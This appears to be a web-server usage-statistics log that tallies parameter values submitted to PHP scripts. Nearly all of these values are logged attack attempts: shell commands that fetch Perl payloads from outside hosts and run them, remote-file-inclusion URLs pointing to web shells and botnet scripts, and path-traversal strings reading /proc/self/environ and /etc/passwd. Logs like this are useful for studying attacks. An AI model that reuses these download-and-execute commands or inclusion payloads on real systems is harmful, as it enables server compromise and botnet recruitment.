t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
9
cd /tmp;wget http://206.71.148.89/ferita.txt;curl -O -f http
://206.71.148.89/ferita.txt;lynx -source http://206.71.148.8
9/ferita.txt;lwp-rget http://206.71.148.89/ferita.txt;fetch
http://206.71.148.89/ferita.txt;perl ferita.txt;rm -rf ferit
a.txt
7
cd /tmp;wget http://72.1.85.234/scan.pl;curl -O http://72.1.
85.234/scan.pl;fetch http://72.1.85.234/scan.pl;lwp-download
http://72.1.85.234/scan.pl;fetch http://72.1.85.234/scan.pl
;perl scan.pl;rm -rf *pl*
5
cd /tmp;wget http://74.63.66.62/ferinhaa.txt;curl -O -f http
://74.63.66.62/ferinhaa.txt;lynx -source http://74.63.66.62/
ferinhaa.txt;lwp-rget http://74.63.66.62/ferinhaa.txt;fetch
http://74.63.66.62/ferinhaa.txt;perl ferinhaa.txt;rm -rf fer
inhaa.txt
4
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
4
cd /tmp;wget http://backzor.by.ru/ownz.txt;curl -O -f http:/
/backzor.by.ru/ownz.txt;lwp-rget http://backzor.by.ru/ownz.t
xt;fetch http://backzor.by.ru/ownz.txt;perl ownz.txt;rm -rf
ownz.txt
4
cd /tmp;wget http://72.1.78.162/elite.txt;curl -O http://72.
1.78.162/elite.txt;fetch http://72.1.78.162/elite.txt;lwp-do
wnload http://72.1.78.162/elite.txt;perl elite.txt 153.19.14
1.194 65000 0;rm -rf *txt*
3
cd /tmp;killall -9 perl;wget http://72.1.85.234/scan.pl;curl
-O http://72.1.85.234/scan.pl;fetch http://72.1.85.234/scan
.pl;lwp-download http://72.1.85.234/scan.pl;perl scan.pl;rm
-rf *pl*
3
cd /tmp;wget http://72.1.78.162/elite.txt;curl -O http://72.
1.78.162/elite.txt;fetch http://72.1.78.162/elite.txt;lwp-do
wnload http://72.1.78.162/elite.txt;perl elite.txt 200.143.1
5.26 65000 0;rm -rf *txt*
3
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
3
Parameter lang
ValueAccesses
v 1
Parameter list
ValueAccesses
1 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.whoblocked.110mb.com/stronix.txt? 32
http://72.1.78.162/cmd2.txt? 30
http://www.lordxpl.xpg.com.br/own.txt?? 27
http://www.ilegais.110mb.com/cmd.txt? 17
http://www.freewebs.com/sur00tseclan/httd.txt? 16
http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? 14
http://72.1.85.234/cmd2.txt? 13
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 13
http://users.cjb.net/mircbot/script2.txt?? 9
http://party4you.ch/new/id.txt? 9
OTHER: 559
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/config.php 784
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
uname -a; id 3
id 2
id;uname -a 2
cd /tmp;wget http://vulnerable.we.bs/files/bb.txt;fetch http
://vulnerable.we.bs/files/bb.txt;lwp-download http://vulnera
ble.we.bs/files/bb.txt;curl -O http://vulnerable.we.bs/files
/bb.txt;lynx http://vulnerable.we.bs/files/bb.txt;perl bb.tx
t;rm -rf bb.txt
2
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
1
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht
tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www
.mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co
m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt;
perl asdasd.txt;rm -rf asdasd.txt
1
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*
1
cd /tmp;wget http://h1.ripway.com/fuckkkker/priv8.txt;fetch
http://h1.ripway.com/fuckkkker/priv8.txt;curl -O http://h1.r
ipway.com/fuckkkker/priv8.txt;perl priv8.txt;rm -rf priv8.tx
t
1
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h
ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?
1
Parameter list
ValueAccesses
1 2
Parameter path[docroot]
ValueAccesses
5
Parameter path[docroot] http://human-design.ru/adm/faqsupport/config/t
ester.txt?
ValueAccesses
1
Parameter path[docroot] http://www.apocalypticduck.com/skins/advanced/
config/tester.txt?
ValueAccesses
1
Parameter path[docroot] http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vo
te/tester.txt?
ValueAccesses
2
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 28
http://invisionar.hostinggratisargentina.com/eth0? 26
http://208.74.174.183/brizola.txt? 20
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 16
http://www.santiagoonline.com.ar/http? 12
http://www.santiagoonline.com.ar/readme.txt? 12
http://www.freewebs.com/sethz/php.txt? 12
http://usuarios.arnet.com.ar/larry123/safe.txt? 12
http://www.oslutadores.com/?id=23530 10
9
Parameter path[docroot]\r
ValueAccesses
2
Parameter path[docroot]__
ValueAccesses
3
Parameter path[docroot]http://211.236.244.133/~axlonaxlon/shell.txt?
ValueAccesses
3
OTHER: 591
ScriptTotal Accesses
/wusage/summary/cgi.html//blogger/include.php 772
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
12
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
7
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
5
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
5
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
5
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2
a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp-
download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167.
23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
4
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
4
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt
4
cd /tmp;rm -rf tut*;wget http://inimigo.t35.com/tut.txt;lwp-
download http://inimigo.t35.com/tut.txt;fetch http://inimigo
.t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut.
txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source
http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf
tut.txt*
3
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm -rf *.txt
3
Parameter path
ValueAccesses
http://lupuss.us/shel/r57.txt? 1
Parameter path[docroot]/par
ValueAccesses
1
Parameter path[docroot]
ValueAccesses
http://www.neoncomanda.kit.net/tool25.dat? 18
http://cestari.angelfire.com/lol.txt? 15
13
http://pemlk.iespana.es/tools/tool25.txt? 9
http://aszer.republika.pl/cos1..txt? 8
http://www.capsoir.com/images/TRA.txt? 8
http://aszer.republika.pl/cos..txt? 8
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 8
http://cestari.angelfire.com/bot.txt? 8
http://www.g3nius.net/fuck.txt? 8
Parameter path[docroot]http://3sk3nt.kit.net/spread.txt?
ValueAccesses
1
Parameter path[docroot]http://66.84.35.218/cmd/psk1.txt??
ValueAccesses
1
Parameter path[docroot]http://66.84.35.218/cmd/safe.txt?
ValueAccesses
2
Parameter path[docroot]http://69.80.227.41/debugbr2/tool25.dat?
ValueAccesses
1
Parameter path[docroot]http://71.41.190.203/scanin.txt
ValueAccesses
1
Parameter path[docroot]http://74.52.130.114/~superbr/botnet.txt?
ValueAccesses
1
OTHER: 608
ScriptTotal Accesses
/wusage/weekly/2008/08/03/ 756
Parameters by Submitted Value
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://itcdial.co.uk/adsl/config/test.txt?? 1
Parameter custompluginfile[]
ValueAccesses
http://www.efnetbr.t35.com/test.txt? 6
http://store.at.ua/test.txt?? 1
http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? 1
http://www.blogstorrent.com/blogstorrent-selling/includes/Ch
uCu/id.txt??
1
http://illwolf.angelfire.com/id.txt??? 1
Parameter dir[plugins]
ValueAccesses
http://audi.spb.ru/img/gal/2008/bot.txt?? 1
Parameter mosConfig_absolute_path
ValueAccesses
http://anonimo234.interfree.it/fuck.txt? 1
http://yeonkok.puru.net/img/sistem.gif?? 1
Parameter mosConfig_admin_path
ValueAccesses
http://www.starwarsally.net/id.txt?? 3
http://tomato.pooding.com/lib/weblog/fx29id.swf?? 1
http://www.syahrulazlan.com/login/id.txt??? 1
Parameter path[docroot]
ValueAccesses
http://cccgj.org/media/id.txt??? 1
http://www.suports.es/UserFiles/File/robots.txt?? 1
http://www.100nx-fanpage.de/id.txt?? 1
Parameter sourcedir
ValueAccesses
http://www.tos-belarus.org/data/idfeelcomz.txt??? 18
http://www.samilglass.com/images/v6id.txt??? 17
http://albcrew.t35.com/pw.txt? 13
http://rox4ever.t35.com/TT?? 13
http://www.tos-belarus.org/data/v7id.txt??? 11
http://www.bissmyk.pl/vnc/fx29id.txt?? 11
http://www.freewebs.com/albfranci/scan.txt? 10
http://www.ryhmakalenteri.com/idrose.txt??? 9
http://okto.co.kr//zboard/include/idxx.txt?? 9
http://www.v13.50webs.com/iddd.jpg?? 7
Parameter step
ValueAccesses
1 1
Parameter vwar_root
ValueAccesses
http://www.gornik-klodawa.pl/media/id.txt??? 1
http://www.e-blacklist.net/alditor/bin1.txt?? 1
OTHER: 613
ScriptTotal Accesses
/wusage/summary/cgi.html/admin_settings.php 748
Parameters by Submitted Value
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 28
http://208.74.174.183/brizola.txt? 20
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 16
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://www.freewebs.com/sethz/php.txt? 12
[PHP-PRINCE]?http://usuarios.arnet.com.ar/adipasqua/http? 12
http://overowns.googlepages.com/testera.txt? 11
[PHP-PRINCE]?http://www.elunacy.ca/ss.txt? 11
http://www.oslutadores.com/?id=23530 10
http://overowns.googlepages.com/donottouch.txt? 10
Parameter cmd
ValueAccesses
uname -a; id 6
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
id;uname -a 2
cd /tmp;wget http://vulnerable.we.bs/files/bb.txt;fetch http
://vulnerable.we.bs/files/bb.txt;lwp-download http://vulnera
ble.we.bs/files/bb.txt;curl -O http://vulnerable.we.bs/files
/bb.txt;lynx http://vulnerable.we.bs/files/bb.txt;perl bb.tx
t;rm -rf bb.txt
2
id 2
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h
ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?
1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
1
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht
tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www
.mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co
m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt;
perl asdasd.txt;rm -rf asdasd.txt
1
cd /tmp;rm -rf tut*;wget http://inimigo.t35.com/tut.txt;lwp-
download http://inimigo.t35.com/tut.txt;fetch http://inimigo
.t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut.
txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source
http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf
tut.txt*
1
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm -rf sta.txt*
1
Parameter list
ValueAccesses
1 2
OTHER: 582
ScriptTotal Accesses
/wusage/summary/cgi.html/oneadmin/newsletter/samplenewslette
r.php
747
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 6
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
id 2
id;uname -a 2
cd /tmp;wget http://vulnerable.we.bs/files/bb.txt;fetch http
://vulnerable.we.bs/files/bb.txt;lwp-download http://vulnera
ble.we.bs/files/bb.txt;curl -O http://vulnerable.we.bs/files
/bb.txt;lynx http://vulnerable.we.bs/files/bb.txt;perl bb.tx
t;rm -rf bb.txt
2
cd /tmp;wget http://h1.ripway.com/marley/tut.txt;perl tut.tx
t;rm tut.txt
1
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
1
cd /tmp/;wget tim.novoconteudo.com/oi.txt;curl -o oi.txt tim
.novoconteudo.com/oi.txt; perl oi.txt
1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
1
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm -rf sta.txt*
1
Parameter list
ValueAccesses
1 2
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 27
http://208.74.174.183/brizola.txt? 20
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 16
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://usuarios.arnet.com.ar/adipasqua/http? 13
http://www.freewebs.com/sethz/php.txt? 12
http://www.elunacy.ca/ss.txt? 11
http://overowns.googlepages.com/testera.txt? 11
10
http://www.oslutadores.com/?id=23530 10
OTHER: 581
ScriptTotal Accesses
/wusage/summary/cgi.html/oneadmin/newspublish/include.php 732
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 7
id 4
Parameter path[docroot]
ValueAccesses
http://invisionar.hostinggratisargentina.com/eth0? 42
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 27
http://usuarios.arnet.com.ar/larry123/safe.txt? 25
http://normanzito.iespana.es/http.txt?? 16
http://usuarios.arnet.com.ar/larry123/ka.txt? 16
http://usuarios.arnet.com.ar/larry123/exploit.txt? 14
http://usuarios.arnet.com.ar/adipasqua/http? 13
http://usuarios.arnet.com.ar/larry123/http? 12
http://dark4ngel.hostinggratisargentina.com/http? 12
http://www.iff.coop/.../bre.txt? 12
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 531
ScriptTotal Accesses
/wusage/weekly/2008/08/17/ 731
Parameters by Submitted Value
Parameter REX[INCLUDE_PATH]
ValueAccesses
http://www.curling-erfurt.de/media/id1.txt?? 1
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://gumansin.com/id.txt?? 10
http://zacs.ca/blm/images/banner.jpg?? 2
Parameter _zb_path
ValueAccesses
http://www.unju.edu.ar/agrometeorologia2008//components/com_
joomla/bot.txt??
1
Parameter commonpath
ValueAccesses
http://www.opst.or.kr/board/board_icon/safe.txt??? 1
Parameter custompluginfile
ValueAccesses
http://basclan.org/idv6.txt????? 1
http://huhta-tv.org/idv6.txt???? 1
Parameter custompluginfile[]
ValueAccesses
http://indiumstudios.com/components/id.txt?? 2
http://www.oekk.nl//cache/sistem.gif??? 2
http://www.xscan.net/scan/id.txt?? 2
http://www.elitewheels.ru/images/cnn?? 1
http://8.19.35.63/bhl/id.txt? 1
http://www.clubrexton.net/zboard//r0x.txt??? 1
http://store.at.ua/test.txt?? 1
http://www.gkvbreda.nl/themes/media/fastid.txt?? 1
http://clubsuscriptores.eltiempo.com/templates_c/id.txt? 1
http://www.prosubi.com.au//images/.bash/id7by.txt ? 1
Parameter inc_dir
ValueAccesses
http://yvonboulianne.com/language/id.txt?? 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.science-lausd.net///upload/test.txt? 1
Parameter p
ValueAccesses
8/skins/advanced/advanced1.php?pluginpath[0]=http://www.geoc
ities.com/ixan_xdet/id.txt??
1
Parameter sIncPath
ValueAccesses
http://www.tortuga-finance.com/includes/.../on.txt?? 2
http://www.lawebinternacional.com/modules/dtree/id3.txt? 1
http://208.98.22.241/id.txt??? 1
http://www.geocities.com/axenses/id.txt??? 1
OTHER: 693
ScriptTotal Accesses
/wusage/summary/cgi.html//phplive/help.php 730
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
uname -a; id 3
id 2
id;uname -a 2
cd /tmp;wget http://vulnerable.we.bs/files/bb.txt;fetch http
://vulnerable.we.bs/files/bb.txt;lwp-download http://vulnera
ble.we.bs/files/bb.txt;curl -O http://vulnerable.we.bs/files
/bb.txt;lynx http://vulnerable.we.bs/files/bb.txt;perl bb.tx
t;rm -rf bb.txt
2
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
1
cd /tmp/;wget tim.novoconteudo.com/oi.txt;curl -o oi.txt tim
.novoconteudo.com/oi.txt; perl oi.txt
1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
1
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*
1
cd /tmp/;wget tim.novoconteudo.com/oi.txt; perl oi.txt 1
Parameter css_path
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 26
http://208.74.174.183/brizola.txt? 20
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 16
15
http://usuarios.arnet.com.ar/larry123/safe.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://www.elunacy.ca/ss.txt? 11
http://www.oslutadores.com/?id=23530 10
http://members.lycos.co.uk/fotosrome/botall.txt? 10
http://proxysx.t35.com/x0.txt? 9
Parameter css_pathhttp://usuarios.arnet.com.ar/adrikrasnow/rfi/bla.txt
?
ValueAccesses
3
Parameter css_pathhtttp://www.tamturk.org/c99.txt?
ValueAccesses
1
Parameter list
ValueAccesses
1 2
OTHER: 567
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://usuarios.arnet.com.ar/larry123/exploit.txt? 20
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://www.santiagoonline.com.ar/readme.txt? 13
http://wsteam.net/bt/var.txt? 12
http://usuarios.arnet.com.ar/adipasqua/http? 12
http://usuarios.arnet.com.ar/larry123/ka.txt? 12
http://dark4ngel.hostinggratisargentina.com/http? 12
http://invisionar.hostinggratisargentina.com/eth0? 11
http://overowns.googlepages.com/testera.txt? 11
http://overowns.googlepages.com/donottouch.txt? 10
OTHER: 601
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 7
OTHER: 721
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.a-p-s.org.au/apscon/2007/images/x.txt? 5
http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? 5
http://www.hobbiz.com/cmd.txt? 5
http://apaguapa.com/c99.txt? 5
http://212.59.7.10/share/id.txt?? 4
http://normanzito.iespana.es/http.txt?? 4
http://www.freewebs.com/newila/off.txt?? 4
http://usuarios.arnet.com.ar/adrikrasnow/rfi/bla.txt? 4
http://www.ebci.ucr.ac.cr/administrator/images/.on?? 4
http://www.alexcarbonell.com/online.wellsfargo.com/security-
update/securitynet/securewpbcsa.txt?
4
OTHER: 684
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter controller
ValueAccesses
../../../../../../../../../../..//proc/self/environ 00 30
OTHER: 698
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.zeyteen.net/aho.txt?? 3
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
3
http://tckct.co.uk/public_htm/speed.txt? 3
http://claroline.lct-net.cl/id??? 3
http://www.cfr.cl/mail/bitch.txt?? 3
OTHER: 713
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../..//proc/self/envi
ron
3
OTHER: 725
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://dark4.hostinggratisargentina.com/cmd? 3
OTHER: 725
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter controller
ValueAccesses
../../../../../../../../../../..//proc/self/environ 00 36
Parameter option
ValueAccesses
com_goole 2
OTHER: 690
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://bitchxx.iespana.es/bitch.txt? 3
http://www.admnyagan.ru/config/exp667.txt? 3
ftp://132.203.200.248/nod32/new? 3
http://www.kcdesi.com/a1.txt? 3
http://www.iff.coop/.../bre.txt? 3
http://capodorso.com/accounts/inc/sys.txt?? 3
http://www.kibarnakliyat.com:8383/bitch.txt?? 3
http://www.freewebs.com/normancito/asdasd.txt?? 3
http://scanbx.iespana.es/bitch.txt?? 3
3
OTHER: 698
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 14
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
39
../../../../../../../../../../../../..//proc/self/environ 00
2
OTHER: 673
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.freewebs.com/normancito/em.txt?? 2
OTHER: 726
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter option
ValueAccesses
com_jscalendar 21
com_myblog 14
com_product 7
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
7
Parameter view
ValueAccesses
../../../../../../../../../../../../..//proc/self/environ 00
8
OTHER: 671
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.reachne.org//components/cmd.txt? 2
http://66.153.86.221/www??????????????????????????????????? 2
OTHER: 724
ScriptTotal Accesses
/wusage/weekly/2011/05/01/ 728
Parameters by Submitted Value
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 1
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../../etc/passwd 1
Parameter option
ValueAccesses
com_google 289
OTHER: 437
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_extcalendar/admin_ev
ents.php
728
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.ndrifters.net/images/r57.txt? 2
http://www.minhud.no/config/exp667.txt? 2
http://www.mta.cl/galeria2/galery.txt? 2
http://freewebs.com/normancito/kaka.txt? 2
http://www.vsm.gov.tr/ow33.txt? 2
http://dark4.hostinggratisargentina.com/kill? 2
